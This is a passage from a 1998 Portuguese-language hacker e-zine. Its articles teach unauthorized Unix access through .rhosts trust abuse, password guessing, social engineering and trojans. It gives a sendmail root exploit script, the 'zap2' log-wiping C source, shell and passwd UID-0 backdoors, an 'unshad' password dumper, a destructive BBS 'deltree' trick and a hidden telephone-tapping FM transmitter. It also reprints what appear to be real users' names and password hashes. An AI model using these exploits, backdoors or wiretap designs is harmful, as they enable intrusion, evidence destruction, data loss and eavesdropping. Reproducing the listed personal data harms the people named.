rio em q ele estah, por exemplo /bin. Note q ha um ponto na frente de rhosts,
is quer dizer q o arquivo eh oculto, entao vc devera dar o comando ls -a:

 $ ls -a

   .rhosts     rlogin

 $

   Beleza ele tah lah, quer dizer q vc agora pode logar sem ter q colocar a
password! Faa o seguinte, edite o arquivo .rhosts, vc vai verificar q lah
existem os usernames e os hosts, embaixo do host q vc pretende atacar, coloque
a seguinte linha:

--corte--
+ +
--corte--

   Saia do editor e grave o arquivo... Soh isso??? Ehh, soh isso mano, agora
eh soh se divertir...

   SE VC NAO TIVER UMA CONTA
  -=-=-=-=-=-=-=-=-=-=-=-=-=-

   Bom, eh logico q para pegar acesso root vc precisa de uma conta, para isso
eu classifico dois metodos, o facil e o dificil.

   METODO FACIL:

   Com o metodo facil, vc precisa ter conversa e um programa de IRC. Vc vai
ter q exigir muito de sua labia em certos casos, outros nem tanto...
   Primeiro entre em qquer servidor de IRC, de preferencia a canais #hacking
#unix, ou qquer outro onde os hackers se encontram, e onde tem hacker tem la-
mer. Fique de olho em varios canais, pra ver se tem um lamer q faz uma pergun-
ta tola, alguem vai falar merda pra ele, ou o mais provavel, ele vai ser chu-
tado do canal, entao fale com ele em PVT, e responda a pergunta dele, va pu-
xando conversa, ate ele ganhar sua confiana, aih ve se vc consegue pegar o
login e a senha dele, de um jeito, como? Invente, sei lah, se ele usa o Win
3.1 pea os arquivos de configuraao dele, invente algo, se ele for mais di-
ficil, consiga o e-mail dele e mande um trojan, como aquele q o Cebola falou
na seao ViRii da ed. 02 do zine. Ateh q vc consiga o login e a senha do tapa-
do...

OBS.: Soh faa isso com lamers

   METODO DIFICIL:

   Esse eh bem mais chato e exige paciencia. Antes ache o host de um servidor
mais novo, q provavelmente usam senhas babacas, ou as mesmas do login, coisa
q nao eh dificil acontecer. entao do seu shell faa o seguinte:

 $ finger @merda.com.br

Login    Name                 Tty   Idle  Login Time   Office     Office Phone
rafa     Rafael Papael         p2   4:46  Jan 27 11:19
sjm      Silvano Jose Medeiros p5     3d  Jan 16 15:35
root     System Administrator  p3   4:59  Jan 16 10:17

OBS: Este eh um finger inventado, se seu nome consta aki eh mera coincidencia!

Entao mais tarde, quando sua vitima cair fora do sistema, tente logar:

Login: rafa

   A password, vc terah q chutar, primeiro comece com o mesmo do login, se
nao der va tentando:

rafael
papael
Papael
rafael98

   Coisas assim, se vc conseguir, alem de vc ter uma conta vc tmb eh um cagao,
pois esse metodo eh phoda pra caralho!!!

   PEGANDO ROOT
  -=-=-=-=-=-=-=-

  Aki vou por soh uma maneira de ser o root, outras fica pra proxima, q eu
jah to de saco cheio. Aki vai um bug do sendmail 8.73 e 8.83. Rode o script
abaixo. Vc vai cair no diretorio /tmp. De um ls -l. Se tiver um arquivo SUID
sh, digite whoami. Se vc nao for o root execute o arquivo ./sh, pronto...

sm.sh
-- cut here --
echo   'main()                                                '>>smtpd.c
echo   '{                                                     '>>smtpd.c
echo   '  setuid(0); setgid(0);                               '>>smtpd.c
echo   '  system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");      '>>smtpd.c
echo   '}                                                     '>>smtpd.c
echo   'main()                                                '>>leshka.c
echo   '{                                                     '>>leshka.c
echo   '  execl("/usr/sbin/sendmail","/tmp/smtpd",0);         '>>leshka.c
echo   '}                                                     '>>leshka.c

cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
cd /tmp
sh
-- cut here --

OBS: Depois nao esquea de dar um chmod +x sm.sh pra executa-lo...

   APAGANDO SEUS RASTROS
  -=-=-=-=-=-=-=-=-=-=-=-

   Bom, depois, se vc conseguir pegar root, vc deve dar uma vasculhada pelo
sistema, afim de encontrar os arquivos de log, pro sysadmin nao saber quem
esteve lah, ele pode descobrir q alguem invadiu o sistema, mas nao quem...
   Para isso, existem alguns programas q apagam os arquivos pra vc. Mas antes
de usar algum programa, procure os arquivos, pois antes de compilar, vc tem
que modificar a fonte e recompila-lo, agora com o caminho dos arquivos. Ex.:

#define WTMP_NAME "/usr/adm/wtmp"

   Ai vai a fonte do programa ZAP:

z2.c

-- cut here --
#include
#include
#include
#include
#include
#include
#include
#include
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"

int f;

void kill_utmp(who)
char *who;
{
    struct utmp utmp_ent;

  if ((f=open(UTMP_NAME,O_RDWR))>=0) {
     while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
       if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
                 bzero((char *)&utmp_ent,sizeof( utmp_ent ));
                 lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
                 write (f, &utmp_ent, sizeof (utmp_ent));
            }
     close(f);
  }
}

void kill_wtmp(who)
char *who;
{
    struct utmp utmp_ent;
    long pos;

    pos = 1L;
    if ((f=open(WTMP_NAME,O_RDWR))>=0) {

     while(pos != -1L) {
        lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
        if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
          pos = -1L;
        } else {
          if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
               bzero((char *)&utmp_ent,sizeof(struct utmp ));
               lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
               write (f, &utmp_ent, sizeof (utmp_ent));
               pos = -1L;
          } else pos += 1L;
        }
     }
     close(f);
  }
}

void kill_lastlog(who)
char *who;
{
    struct passwd *pwd;
    struct lastlog newll;

     if ((pwd=getpwnam(who))!=NULL) {

        if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
            lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
            bzero((char *)&newll,sizeof( newll ));
            write(f, (char *)&newll, sizeof( newll ));
            close(f);
        }

    } else printf("%s: ?\n",who);
}

main(argc,argv)
int argc;
char *argv[];
{
    if (argc==2) {
        kill_lastlog(argv[1]);
        kill_wtmp(argv[1]);
        kill_utmp(argv[1]);
        printf("Zap2!\n");
    } else
    printf("Error.\n");
}
-- cut here --

   1998, MaNdRaCk - HackPHR Zine
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                            04  -  BACKDOORS
                           -=-=-=-=-=-=-=-=-=-

- Backdoor em Q-A
Facam um programinha ou um questionario bem legalzinho em q-a. E de um jeito
de fazer com q o sysop burrinho instale ele na bbz. Se o cara for bem idiota,
ele nem vai olhar o codigo do q-a. O arq com os comandos q-a estao na hp da
hack n' phreak.

- Backdoor por infectacao de arqs
Peguem algum DSZ infectado ou arrumem em alguma bbz um trojan maker para ra.
Com eles vcs podem arrumar acesso de sysop. Eh so mandar para o sysop como
no item acima.

Pronto. Agora vc ja tem o acesso de sysop na bbz. E agora? vc ja pegou todos
os arqs interessantes da bbz? Vamos fude-la agora.

Va ao menu de msgs e mande uma msg para vc mesmo e com o corpo da msg com
comandos DOS (algo tipo: deltree/y c:\*.*).
Agora, va ao menu novamente e leia sua msg. Vc vai perceber algumas opcoes
a mais (ja q vc esta com nivel de sysop). Vc nao vai usar todas elas, somente
a opcao X (export). Nela vc pode "exportar" o texto da msg para qualquer arq
do hd do cara! Mande entao exportar sua msg para o autoexec do cara!

Pronto, agora a bbz escrota nao existe mais.

Vc ja deve ter acessado alguma bbz q use o wgm. Aquelas bbz fraquinhas onde
os lamahs acessam por modo grafico no ruindows e podem acessar inet.
Bom... esse WGM eh bem seguro e muito dificil de se entrar. A unica vez q eu
consegui entrar foi descobrindo o passwd do sysop. Mas ha uma luz no fim do
tunel! Apesar da seguranca, essas bbz tem uma falha: O sysop. Ta... e como
explorer esse BUG???
Nessas bbz, eh possivel serem confecionados aplicativos em VB3. Olha ai
a nossa salvacao! O problema eh q eu ainda nao tenho a listas dos arqs ou os
VBXs q se devem usar para fazer esses programas.=20

Contudo, peco a vcs, que deem um jeito de arrumar o WGM SERVER. Com isso,
vamos poder descobrir os segredos dessa "falha". Quem tiver a possibilidade,
mande para nos! Vamos ter o prazer de distribuir os Backdoorz feitos para o
WGM.

   1998, ShK - HackPHR Zine
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                  05  -  COMPLEMENTANDO OS NUMEROS BINARIOS
                 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

      Computadores pessoais como os baseados nos microprocessadores Intel 8088
e 80286 (MUSEU :-), sao PCs de 16bits. Isto significa que podem trabalhar com
numeros binarios de ate 16 casas ou bits, o que, traduzido para numeros deci-
mais equivale a 65.536. Se a opreracao exigir um numero superior a esse, o PC
precisa, em primeiro lugar, quebrar esses numeros em componentes menores,
realizar a operacao em cada componente e entao recombinar os resultados em uma
unica resposta. Os PCs mais comuns, baseados nos microprocessadores Intel
80386 e 80486, sao computadores de 32bits, ou seja, podem manipular numeros
binarios com ate 32bits - o equivalente a notacao decimal 4.294.967.296.
A habilidade em trabalhar com ate 32bits por vez torna esses PCs mais rapidos
do que os de 16bits.

Numero Decimal       Numero Binario

          0			   0
          1          1          <----- Note que como a sequencia vai mudando
          2          10                a cada quatro numeros binarios e vai
          3          11                repetindo os numeros apos isso... soh
          4          100               se bota o numero 1 na frente de todos.
          5          101
          6          110
          7          111
          8          1000
          9          1001
          10         1010
          11         1011
          12         1100
          13         1101..........

      Os transistores nao sao utilizados somente para gravar e manipular nume-
ros. Os bits podem tambem, significar verdadeiro (1) ou nao verdadeiro (0).
As combinacoes dos transistores em varias configuracoes recebem o nome de
portas logicas, quando estao dispostas em arranjos (arrays) sao chamadas de
half-adders (somando parciais), que por sua vez sao combinadas em full-adders
(somadores completos). Mais de 260 transistores sao necessarios para criar um
somador completo (full-adder) que possa gerenciar operacoes matematicas para
numeros de 16bits.
     Alem disso, os transistores tornam possivel que uma pequena quantidade de
corrente eletrica controle outra corrente mais forte - do mesmo modo que a
pequena quantidade de energia necessaria para acionar um interruptor de parede
pode controlar a energia mais potente que vem atraves dos fios ate a lampada.

   1998, HaCk-MaN - HackPHR Zine
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                    06  -  BACKDOOR SH: by GhOsT InVaDeR
                   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Seguinte, eu nao acho que backdoor (porta dos fundos ) seja a melhor maneira
de definir esta "tatica" que irei falar, mas tb nao ah outra melhor.
Bom, o maior desafio de um hacker eh conseguir pegar root em um sistema e
poder fazer simplesmente ALL.
Mas da ateh pena em saber que depois voce nao podera voltar e conseguir o
acesso root novamente a nao ser que voce instale uma boa backdoor.
Todos sabemos que cada usuario tem uma shell no sistema Unix ou Linux, ate
mesmo o root.
Muitas pessoas que frequentam o irc pensam que shell e apenas uma conta
que da acesso a telnet.
Resumidamente pode ate ser isso, mas vai muito alem desta definicao o poder
da shell.
O arquivo shell fica a maioria das vezes no diretorio /bin/sh e
define o UID, GID, etc do usuario.

Ex:
Voce conecta com um login= james  senha=banana.
Entao automaticamente a shell do usuario eh executada e o sistema identifica
o ID do usuario e que tipo de acesso e permissao ele tem.
Digamos entao que eu quero saber o id deste usuario.
Entao eu digito id

$ ID
james UID=10156 GID=4 bla bla bla bla bla bla bla

Putz, com esse id ele nao pode acessar quase nada no sistema.
(Lembrando que quanto maior o UID menor sao suas permissoes no sistema)

Agora digamos que voce conecta como root.
O esquema eh o mesmo, o sistema executa o /bin/sh e identifica qual seu
acesso e que permissao ele tem.
No caso, total.
Mas digamos que voce deseja conferir o id.
Entao digite no prompt:

$ ID
root UID=0 GID=0 bla bla bla bla bla bla bla

Ai voce pensa:
__Ahhhh, o esquema ta todo naquele arquivo sh que fica no /etc.

Isso mesmo.
Agora, o que isso tem a ver com backdoor??
Bom, supondo que voce esteja com acesso root, siga esses passos:

1) Escolha um diretorio nao suspeito ou crie um subdir.

2) Copie o /bin/sh pra dentro dele
obs: de preferencia oculto, salve com o ponto na frente .sh

3) Agora de permissao a ele para que qualquer usuario possa executa-lo
   use: chmod 777 .sh

4) Pegue o /etc/passwd (voce tambem pode criar um usuario com shell no sistem
a, mas eh muito arriscado)

5) Saia do sistema e desencripte o passwd.

6) Escolha um usuario qualquer que tenha shell e volte no sistema

7) Execute o .sh que voce copiou e bingo!! voce tem id de root

8) Digite ID para conferir seu uid.

Simples mas eficaz.
Ahh, voce nao entendeu?
entao vou passar o que fazer em comandos:

COMO ROOT FACA:

$ cp /bin/sh /tmp/.sh

$ chmod 777 /tmp/.sh

$ cat /etc/passwd (ou crie um usuario: adduser login_cara)

$ logout

desencripte uma senha ou entre com a conta que voce criou.

COMO USER COMUM FAA:

$ ID
james UID=10156 GID=4 bla bla bla bla bla bla bla

$ cd /tmp

$.sh

$ ID
root UID=0 GID=0 bla bla bla bla bla bla bla

BINGO!!
Agora voce tem o id de root.

Ah outra forma de usar o UID e GID.
Digamos que o provedor que voce esteja eh bem grande e contem uma vasta
lista de usuarios que contem shells em seu passwd.
Agora fica facil, basta editar o /etc/passwd e mudar o UID e GID de algum
usuario para 0.

Obs: Nao esqueca que esse metodo eh arriscado, e que se o usuario que voce
escolheu mudar a senha voce nao podera voltar mais.

Obs2: Confira se nao ha um backup do passwd, geralmente -passwd, passwd-,
.passwd etc...

Vou supor que la tenha o editor pico:

$ PICO /etc/passwd

                    ______mude aqui
                    | |
pparo:CMjZikulXQqK.:0:0:PAULA DORNHOFER PARO:/home/EE97/pparo:/etc/sh
goroh:grwta/Jaq5vpg:10272:1011:Andre de Oliveira Fernandes - 900160:/home/EC90/goroh:/bin/csh
teixeira:bNTBqVVSd5zCI:10495:1011:Gustavo F. Teixeira:/home/EE93/teixeira:/bin/csh
rodolfon:0AzVjyyD40TFU:10177:1011:Rodolfo Jose Leite Netto:/home/EE92/rodolfon:/bin/csh
isa9000:yOs699b9JJ4I6:10632:1011:Isabella Sousa Carreira:/home/EE93/isa9000:/bin/csh
daniloa:sfsS0gQr.J.zM:9399:1011:DANILO ANGELO - 950424:/home/EC95/daniloa:/bin/csh
alcaraz:QswOnrLt/sn62:10209:1011:Carlos Alberto Duarte Alcaraz:/home/EE92/alcaraz:/bin/csh
pinho:GHV/.J8MdGdBU:10256:1011:Fernando Correa de Araujo Pinho:/home/EC91/pinho:/bin/csh
hideo:lLt//EJT7klnE:10186:1011:Edson H. Fujishima - 930187:/home/EE93/hideo:/bin/csh
tatiana:zCr9VVfVXDLpM:10750:1011:Tatiana Steckelberg Iwashima:/home/EC93/tatiana:/bin/csh
mauric0:rPmUtvNcTtZt2:10190:1011:Mauricio Dester:/home/EE87/mauric0:/bin/csh

:aperte ctrl + x pra sair e salve quando solicitado.

$ logout

agora volte com o login e a senha deste usuario que voce alterou o id
que voce ja entra com ID 0 (acesso total)

GhOsT InVaDeR (ghostin@freemail.globalsite.com.br)

   1998, GhOsT InVaDeR - HackPHR Zine
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                    07  -  PLACAS DE CIRCUITO IMPRESSO
                   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

   Bom, o q me levou a escrever essa materia foi o fato de q eu ja to cansado
de ficar falando sobre boxes sem dar o projeto de uma BOX interessante, pen-
sando nisso, resolvi passar nesta ediao, uma box q transmite as conversas
telefonicas. Eh uma placa pequena, q vc deixa dentro do fone, eh isso mesmo,
dentro do fone!!! Mas tem aqueles q nunca tiveram um contato aprofundado com
a eletronica, entao, pensando nessas pessoas q eu vou escrever isso aki.
   Ninguem precisa saber o q um capacitor de 100uF faz para montar esses pe-
quenos projetos, basta seguir todas as indicaoes do diagrama e montar adequa-
damente para ele funcionar, mas para a placa ficar melhor ainda, eu sugiro q
vc treine um pouco sua habilidade de soldar, pois alem de seu trabalho ficar
melhor, a box q ensino, eh muito pequena, e uma solda mal-feita pode danificar
todo o circuito, pra comeo de conversa vc vai precisar de:

   - Um soldador (aquele ferro q esquenta)
   - Solda (aquele ferro mole q vem enrolado)

   Isso eh essencial para vc comear uma pequena soldagem. Eh logico q vc tmb
vai precisar de alguma coisa pra soldar, pegue uns fios velhos para praticar.
Pronto, coloque o soldador na tomada e espere esquentar. Depois de um tempo
ele vai estar bem quente (cuidado pra nao fazer uma tatuagem) pegue a solda
e aproxime do local a ser soldado, entao com a ponta do soldador, encoste na
solda, para q ela derreta e entre em contato com o local desejado, no nosso
caso, onde os fios se unem. Ok, vc precisa de um diagrama:

          Soldador  -   \\       /  - Solda
                         \\    /
                          \\ /
               =========----*----============ - fios
                           |
                        Solda feita

   Ahm, eu sei o diagrama ficou uma merda e nao ajudou em nada, pelo menos
ocupa um espacinho, hehehe...
   Bom, voltando a aula, nao deixe a solda pingar na mesa ou em vc, ela eh
quente tmb. Ela seca rapido em questao de segundos.
   Para a soldagem de componentes na placa, o esquema eh o mesmo, vc poe os
terminais do componente nos seus devidos buracos e solda, o que sobrar vc cor-
ta fora, nao puxe a perninha fora, corte com um alicate de corte...
   Soh um lembrete: Na hora de soldar o componente, nao solde fora da trilha
nem apenas o terminal, solde de uma maneira em q o terminal fique bem conecta-
do a trilha.
   Sobre soldagem eh soh isso, nao eh nada teorico, precisa de pratica...
   Vamos a parte da confecao da placa:

OBS.: Muito cuidado ao usar o ferro, lembre-se q ele se aquece em temperaturas
      acima dos 300 graus Celsius

   CONFECCIONANDO A PLACA DE CIRCUITO IMPRESSO

   Antes de tudo vc precisa comprar a placa, ela tem um dos lados cobreados e
pode ser encontrada facilmente em casas de eletronicos, peca um tamanho ade-
quado para a montagem q vc vai realizar.
   Agora o nosso proximo passo eh fazer as trilhas para a eletricidade passar
por onde ela deve. Vc pode ver em qualquer livro ou revista como ela eh, vou
tentar fazer um diagrama, mas eh ruim:

 Placa de Circuito Impresso:

  ______________________
 |                      |     OBS.: Pra ninguem vim me perguntando o q essa
 |  o----\    o o o o   |           placa faz: Ela eh soh um EXEMPLO, nao faz
 |  o--\ |      |       |           nada, tanto q estah incompleta...
 |     | \----o o o o   |
 |     \---o  |   |     |
 |       o----/   |     |
 |         o------/     |
 |______________________|

   Onde:

   o = buraco onde passa o terminal do componente (Ilha)

   / = curva

   \ = curva

  -- = trilha

   Bom, em varios lugares existem uns decalques pra vender para fazer as pla-
cas, no meu caso, eu uso um metodo mais simples: Tiro um xerox ou desenho a
placa no tamanho original (que ela devera sair) e com um estilete, corto as
trilas (do papel, eh claro) para q fique um molde, entao coloco em cima da
parte cobreada da placa, fixo com durex se necessario, e passo o esmalte...

   Esse eh um metodo q eu utilizo, se vc quiser utilizar um outro problema seu
Bom, vamos comear entao. Quando vc tiver em maos a chapa cobreado, serre-a de
acordo com suas necessidades, depois de um jeito nela para q fique bem brilhan
te, passe um bombril, ou coisa assim. Depois q ela tiver bem bonitona, tenha
em maos o molde, ou o decalque, ou a merda q vc vai usar pra marcar as trilhas
Eu recomento q vc marque os locais onde vc tem q fazer o furo, fica mais facil
depois. Entao passe o esmalte, ou o decalque, depois de a placa ter suas tri-
lhas marcadas, vc pode preparar o pecloreto para deixar ela lah. Faa isso:
   Compre um pote de Percloreto de Ferro, ou po de percloreto, e dissolva em
agua, dissolva na quantidade de agua q ta marcada na embalagem do po. Dissolva
numa bacia, ou outro lugar para colocar a placa. Nao se preocupe se colocar
percloreto demais, ele pode ser usado novamente. Depois q vc colocar o po vai
ocorrer uma reaao quimica, cuidado pra nao respirar o vapor q vai sair de
lah, pois eh toxico, e faa isso ao ar livre, nao deixe nenhum material meta-
lico entrar em contato com o vapor, para evitar a corrosao. Depois q vc fez
a mistura, coloque a placa lah dentro, se quiser amarre um fiozinho, eh mais
facil de tirar depois. Para dissolver mais rapido, fique balanando a bacia,
ou puxe o fio pra lah e pra cah...
   Deixe lah ate q o cobre saia todo, ficando apenas as partes q vc marcou,
seja com o decalque ou com o metodo q vc usou. Nao boie, nao deixe a placa por
muito tempo, senao jah era o seu projeto. Nao estranhe se quando vc tirar a
placa ficar meia rosada. Depois vc pode lava-la com agua e guardar o perclore-
to num pote qualquer, desde q esteja bem protegido. Depois de lavar a placa,
vc pode tirar o decalque com bombril, ou se vc usou esmalte, tire com um algo-
dao e acetona. Agora soh falta furar a placa e pronto... Na hora de furar,
faa o furo ideal, nao muito largo, o essencial pro terminal passar...
   Aih estah sua placa de circuito impresso...

OBS.: Guarde a sobre do percloreto num recipiente PLASTICO, pois ele eh alta-
      mente corrosivo ao metal

   1998, MaNdRaCk - HackPHR Zine
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                    08  -  BOX - TRANSMISSOR FM OCULTO
                   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

   Ai estah um projeto de uma box para linhas NACIONAIS, q transmite conversas
telefonicas em FM. Daih vc pergunta, o e q tem de tao incomun nisso? Incomum
eu nao diria, eu diria interessante. Essa maravilha opera na faixa dos 60 a
100 Mhz, transmitindo todas as conversas num raio de + ou - uns 40 m. E o
melhor de tudo, ela vai escondida dentro do telefone...
   E tem mais, nao precisa de pilhas, eh alimentada pela propria linha telefo-
nica!! Ohh.
   A unica desvantagem desse circuito eh q a placa de circuito impresso tem q
ser pequena o bastante para entrar dentro do fone, nos padroes, vc podera fa-
ze-la no maximo com 2,3 cm de largura, portanto, se vc nao tem muita pratica
na soldagem e confecao de placas de circuito impresso, nem tente fazer esse
projeto, senao eh um desastre na certa...
   Outra desvantagem eh q o som do telefone "boxeado" fica mais baixo, mas
nada q interrompa o processo. A instalaao do aparelho eh outra vantagem, vc
precisa apenas abrir o fone, aquele q vai em cima do gancho, e prender os
jacares nos terminais, sem precisar observar a polarizaao...

   MATERIAL NECESSARIO:

   Q1 - BF494 - transistor NPN de RF
   D1, D2, D3, D4 - 1N4148 - diodo de uso geral

   (1/8 W, 5%)
   R1 - 1K ohm
   R2 - 1,2 K ohms

   C1, C3 - 1 nF - ceramico
   C2 - 10 pF - ceramico

   L1 - bobina pequena

   DIAGRAMA:

            1k
   o-------|||||------         |-----------    ------o---------
jacare 1              |        |          |   /      |        |
                      |        |          |   \      |C2      |
                     /o\       |          |---o     ---10pF   |
                   D1  D2      |              \     ---       |
               ----o    o------o           L1 /      |        |
              |    D3  D4      |              \      |        |
              |      \o/       |              |      |        /
              |       |        |              o-------------|/ Q1
              |       |       ___                           |\ BF494
              |       |       ___ C1                           \
  o--------------------        |  1 nF                         |
 jacare 2     |                |                               |
              |                |               ----------------o
              |                |               |               |
              |                |              ___             == R2
              |                |              ___ C3          == 1K
              |                |               |  1 nF         |
              -----------------o---------------o----------------

   o = ligaoes

   O diagrama tah meio complicado mas eu acho q dah pra entender. Nao vai dar
pra fazer a placa de circuito impresso em ASCII, se vc tiver mais experiencia
vai conseguir fazer uma naboah, mas se vc eh inexperiente, aguarde q eu colo-
co um GIF na home page do PHR pra Download. Se vc tiver acesso a componentes
SMD eh melhor ainda, a placa fica bem menor, mas se vc nao tiver, dah pra
construir tranquilo assim. L1 eh a bobina. Para fazer a bobina escolha um fio
esmaltado 26 a 28, com diametro de uns 5 mm. Para faixas em FM faa com 2+2
espiras. As saidas podem ser feitas com fios de uns 10 cm, com jacares, ou ou-
tra coisa q prenda bem, para nao causar nenhuma interferencia na transmissao
ou mesmo pra nao se soltar com o balano do fone, principalmente se alguem
deixar cair no chao. Para testalo, pode testar em seu telefone, ou com tres
pilhas (4.5 V). Pegue o receptor q vc vai usar, pode ser um radio portatil co-
mum e ajuste numa frequencia entre 60 e 100 Mhz. Fique apertando e soltanto as
espiras para ajustar a frequencia, enquanto tenta achar com o receptor. Depois
de achar a frequencia certa, cuide para nao mexer a bobina, e marque em um pa-
pel ou coisa assim. Depois eh soh instalar no telefone q quiser, e abracadabra
pronto, lembre-se q ele vai transmitir sempre q o fone for tirado do gancho.

   1998, MaNdRaCk - HackPHR Zine
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                            09  -  SHADOW PASSWD
                           -=-=-=-=-=-=-=-=-=-=-=-

Bom... o que vou falar e sobre uma coisa muito lamer e que todos DEVERIAM
saber..... SHADOW! Aparece cada um com uns arquivos falando que tem as senhas
e que e hacker... o arquivo de senhas (geralmente chamado de passwd) e assim:

login:senha:id:uid:comentario:command.com

Quando voce acha um arquivo que tenha no lugar da senha um monte de LETRAS,
voce teve muita sorte! Ou o provedor  uma droga ou voce pego um root muito
lamer! Ficaria mais ou menos assim um arquivo SEM shadow:

root:N48dydkljSf3:0:0::/bin/sh

Bem... se voce arranjou alguma coisa assim.. procure um desencriptador LOGO!
Uns do que eu conheco e: Cracker Jack 1.4 (Windows), Jhuck (Windows) e mais
uns que eu nunca vi funcionar direito! Pra conseguir eles... e so andar um
pouco pelas HP's hackers por ai! Mais caso voce tenha achado um arquivo passwd
da seguinte forma:

root:*:0:0::/bin/sh
root:!:0:0::/bin/sh  (Uma dessas formas, existem varias... essas sao comuns)
root:X:0:0::/bin/sh

Se voce achou um arquivo com essas formas acima mais tem acesso nesse provedor
por telnet... ai a coisa muda! Tem um monte de geito de "tirar" o shadow dos
arquivos... e so ter vontade de procurar que voce acha por ai! Um muito
simples que funciona mais ou menos bem e o UNSHAD. Voce encontra ele por ai
em qualquer lugar! Aqui tem uma c¢pia em C. Voc deve usar o compilador c(cc)
do Unix para compilar o unshad e usa-lo digitando unshad >> arquivo_senhas.

        cc -o unshad unshad.c
        unshad >> senhas.dat

        No caso, as senhas encontradas serÆo armazenadas no arquivo senhas.dat

--------------------------------UNSHAD.C---------------------------------

     #include

main ()

{

 struct passwd *p;

 while(p=getpwent ())

 printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,

  p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);

}

----------------------------------------------------------------------

Mais e se voce nao tem acesso por telnet? Bom, com sorte voce acha um arquivo
passwd que tenha UM login com a senha unshadow. Desencripte ela e logue por
telnet! Geralmente as senhas usadas em log por FTP tem acesso em TELNET
tambem! Ai e fazer a festa!

Como esse assunto e muito lamer mais muitas pessoas nao sacam isso... paro
por aqui! Se a galera ajudar ae... continuamos no proximo zine com coisas mais
interessantes!!!!

   1998, SideW - HackPHR Zine
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                        10  -  CORREIO DA GALERA
                       -=-=-=-=-=-=-=-=-=-=-=-=-=-

   Aki estao alguns mails q recebi com o passar do tempo. Alguns eu jah
respondi antes, por e-mail, mas nao deu pra responder todos, portanto veja
a resposta agora...

   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Bom, de novo , o mesmo merda de internauta volta a te ecrever, novamente
te pedidno ajuda. O que eu queria saber e pra que servem as green boxes
?? Quais sao sua finalidades ?/ Estou te escrevendo isso pq eu arrumei
um programa , como um nome babaca, chamdo phreakzoid, esse programa tem
a capacidade de imitar atrves de sons a Silver, Red, Blue e a Green box.
Li na sua zine sobre todas , menos a green !!
Sera que da para dar um ajudinha ?? Velue !!!
Se vc quiser este programa e so pedir !!!

Muito agradecido.

obs: Eu tb arrumei um outro programa chamdo boxtone, mas eu ainda nao
consegui descobrir a sua finalidade !!! Gostaria de saber se posso tomar
a liberdade de te mandar este porgram, sao apenas 6 kb ! Para vc assim
descobrir a sua funcao !!

RESPOSTA: Todas essas boxes q vc se refere nao funcionam aki no Brasil,
          portanto, jah q vc eh begginer, comece estudando apenas as boxes
          q funcionam aki no Brasil, o programa BoxTone, provavelmente eh um
          gerador de sons em varias frequencias, parecido com o BB q eu fiz,
          e estah na Home Page do zine. Mas pra nao dizer q nao respondi sua
          pergunta, a Green Box cria tres tons diferentes, o tom de COIN CO-
          LLECT, o de COIN RETURN, e o de RINGBACK...

   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 olah...
    desculpe a invasao...

    serah que vc poderia me mandar textos sobre PGP???
    tipo... o que eh.. como usar... etc....

    sou totalmente leiga no assunto.. porem tenho grande vontade em
saber...

    agradeco...
    e aguardo noticias

    []s

RESPOSTA: Pode aguardar a ediao 04 q o Cebola vai fazer um tutorial sobre
          o PGP ok?

   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Cara, achei legal o seu zine, contem informações uteis e certas é dificil
achar na internet textos assim sou programador C , e gostei da seção sobre
virus, etc.

   Daniel.

RESPOSTA: Ok, mas vc tem q agradecer ao Cebola e nao a mim, vcz devem mandar
          criticas e sugestoes das materias de seus respectivos autores...
          O mail do Cebola eh: cebola_br@hotmail.com

   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Se vc quiser por um link da sua página na minha mande o endereço da sua e
   se vc tiver o logo mande junto...

   http://www.terravista.ciclone.com.br/areiasbrancas/1365/index.html

RESPOSTA: Eh logico, pode por quantos linkz quiser...

   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

